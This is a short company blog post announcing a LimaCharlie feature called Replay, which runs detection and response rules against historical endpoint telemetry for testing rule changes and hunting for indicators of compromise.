September 20th, 2021
Running detection & response rules against historical telemetry
Christopher Luft
Replay is the ability to run detection logic over historical data. Recently the team at LimaCharlie made some modifications to the user interface that makes this feature set more accessible.
This capability provides some unique advantages for cybersecurity operations.
Allows for continuous integration / continuous development approach (CI/CD). When rules are modified through your change control process you can confirm that there are no unexpected results by running rules against known data. Think unit tests for detection logic. This moves us closer to the concept of ‘Detectors as Code’.
If a new zero day becomes known you can run a test for known indicators of compromise over the last year of endpoint telemetry.
With Replay you are going to have confidence that your team can move fast and not break things. Save time on your change control process and bring a proven engineering approach to your cybersecurity operations.